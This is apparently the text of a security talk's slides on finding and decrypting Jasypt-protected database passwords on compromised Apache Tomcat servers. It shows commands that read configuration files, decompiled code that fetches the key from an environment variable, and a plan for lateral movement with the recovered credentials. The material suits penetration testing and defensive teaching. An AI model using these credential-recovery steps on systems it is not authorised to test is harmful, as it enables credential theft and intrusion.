2. DISCLAIMER
The views expressed in this talk are those of the author and do
not reflect the official policy or position of Trustwave
SpiderLabs.
3. BACKGROUND
Keith Lee
Senior Security Consultant
Trustwave SpiderLabs
@keith55
http://github.com/milo2012/
http://milo2012.wordpress.com/
https://www.linkedin.com/in/keithlee2012/
• Presented
THOTCON, PHDays, Zeronights, Rootcon, DEFCON (Wall of Sheep, Skytalks, Demo
Labs), Blackhat Asia, HackInTheBox
4. OWASP GUIDE
Password Plaintext Storage
Storing a plaintext password in a configuration file allows
anyone who can read the file access to the password-protected
resource.
Developers sometimes believe that they cannot defend the
application from someone who has access to the configuration,
but this attitude makes an attacker's job easier.
Good password management guidelines require that a
password never be stored in plaintext.
[https://www.owasp.org/index.php/Password_Plaintext_Storage]
5. TOMCAT AND JAVA SERVLET
Apache Tomcat
Apache Tomcat (in this context) is a servlet container.
The server is responsible for managing the lifestyle of servlets,
mapping a URL to a particular servlet and ensuring that the URL
requester has the correct access-rights.
Java Servlet
A Java servlet is a Java program that extends the capabilities of a
server.
They most commonly implement applications hosted on Web servers.
6. WHAT IS JASYPT?
Jasypt (Java Simplified Encryption)
Jasypt is a java library which allows the developer to add basic
encryption capabilities to his/her projects with minimum effort, and
without the need of having deep knowledge on how cryptography
works.
12. IMPORTANT FILES FOR TOMCAT/JAVA SERVLETS
- context.xml (application specific settings) - Data source definitions
(server names, database names, usernames, passwords)
13. IMPORTANT FILES FOR TOMCAT/JAVA SERVLETS
- catalina.properties (class loader paths, security package lists, some
tunable performance properties. custom properties)
14. THOUGHT PROCESS
Understand how things work
Decrypt the passwords
Find the missing pieces
(Keys, passwords, usernames, DB locations, etc)
Find sensitive data in database
Move laterally and vertically in the network
using new found credentials
Don’t run way just because you see encrypted passwords
If you already ‘own’ the host, you should have
everything you need to decrypt
15. HOW JASYPT WORKS
Purpose
• Encrypt clear text credentials in configuration files
• Uses a symmetric key for encrypting and decrypting passwords
Encryption steps
• Extract the properties such as server names, databases and users credentials into a separate
property file
• Replace credentials in configuration files with ‘property placeholders’
• Use the Jasypt CLI utility to encrypt the password using a predetermined key.
• The definitions of ‘property placeholders’ and encrypted passwords in properties file (e.g.
catalina.properties).
Decryption steps
• The decryption key is passed via an environment variable or manually. during runtime.
• The property file is read and the placeholders are replaced with the actual values
16. CONTEXT.XML FILE BEFORE AND AFTER JASYPT
Before encryption with JASYPT
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type=“javax.sql.DataSource”
driverClassName=“com.microsoft.sqlserver.jdbc.SQLServerDriver" url=“jdbc:sqlserver://
db01;database=service_prd” username=“dbadmin” password=“Password1"/>
</Context>
After encryption with JASYPT
• Passwords are replaced by property placeholders
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type=“javax.sql.DataSource”
driverClassName=“com.microsoft.sqlserver.jdbc.SQLServerDriver" url=“jdbc:sqlserver://
db01;database=service_prd” username=“dbadmin” password=“$(db.password)“/>
</Context>
17. IS JASYPT USED ON THE TOMCAT SERVER ?
$ find . -name jasypt-*.jar
/data/tomcat/service01/lib/jasypt-1.9.2.jar
$ cat /data/tomcat/service/conf/context.xml
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type=“javax.sql.DataSource”
driverClassName=“com.microsoft.sqlserver.jdbc.SQLServerDriver" url=“jdbc:sqlserver://
db01;database=service_prd” username=“dbadmin” password=“$(db.password)“/>
</Context>
19. JASYPT - LOADING THE KEY BEFORE RUNTIME
• system environment variables
(export APP_ENCRYPTION_PASSWORD=O8Z13Epg0Moai23q6M8z)
• web configuration (Web PBE configuration)
• class that implements org.apache.tomcat.util.IntrospectionUtils.PropertySource.
Class is invoked when ${parameters} are found in XML files when Tomcat parses
them.
20. THINKING LIKE A SYSADMIN/DEVELOPER
So what does this mean to an attacker ?
The key must be conveniently located somewhere on the system
Important considerations when using servlets and Jasypt
The servlets on the Tomcat server must be able to survive a reboot.
Servlets must start up automatically.
It is just not feasible to manually enter the encryption key for Jasypt after every reboot.
If the server goes down and doesn’t come back up immediately, it will affect my KPI
21. HUNTING FOR THE PUZZLE PIECES
1. Encryption Key
2. Hostnames, Usernames, Password (place holders)
3. Encrypted passwords
22. HUNTING FOR THE PUZZLE PIECES
Encryption Key
Most commonly defined in an environment variable (easiest to implement)
Can be found in a number of places
- Environment variable
— Startup scripts
- Classes
24. CATALINA.PROPERTIES
org.apache.tomcat.util.digester.PROPERTY_SOURCE=com.org
name.tomcat.utils.EncryptedPropertySource
‣ Sample catalina.properties file
$ ls /data/tomcat/service01/lib/
/data/tomcat/service01/lib/jasypt-1.9.2.jar
/data/tomcat/service01/lib/tomcat-utils-1.0.1.jar
$ unzip tomcat-utils-1.0.1.jar
Archive: tomcat-utils-1.0.1.jar
inflating: META-INF/MANIFEST.MF
inflating: com/orgname/tomcat/utils/EncryptedPropertiesUtils.class
inflating: com/orgname/tomcat/utils/EncryptedPropertySource.class
inflating: META-INF/maven/
‣ Searching for the class file that will be invoked when ${parameter}
denoted parameters are found in the XML files that Tomcat parses.
25. TAKING A CLOSER LOOK AT DECRYPTION CLASS FILE
$ unzip tomcat-utils-1.0.1.jar
inflating: com/orgname/tomcat/utils/EncryptedPropertySource.class
import org.jasypt.util.text.BasicTextEncryptor;
public class EncryptedPropertiesUtils
{
private static String passPhrase;
public static String decrypt(final String textToDecrypt) {
loadPassPhrase();
final BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
textEncryptor.setPassword(EncryptedPropertiesUtils.passPhrase);
return textEncryptor.decrypt(newValue);
}
private static void loadPassPhrase() {
String pp = getenv("APP_ENCRYPTION_PASSWORD");
EncryptedPropertiesUtils.passPhrase = pp;
}
}
‣ Sample decompiled source code of EncryptedPropertySource.class
33. OTHER NOTES
$ ./encrypt.sh input=passwrod password=1
----ENVIRONMENT-----------------
Runtime: Oracle Corporation Java HotSpot(TM) 64-Bit Server VM 25.131-b11
----ARGUMENTS-------------------
input: passwrod
password: 1
----OUTPUT----------------------
S4siv8IPYClnMPCg8GwNYzKZotISf78U
Jasypt does not enforce the length of the secret key.
34. ITS BETTER THAN NO ENCRYPTION
[https://wiki.apache.org/tomcat/FAQ/Password]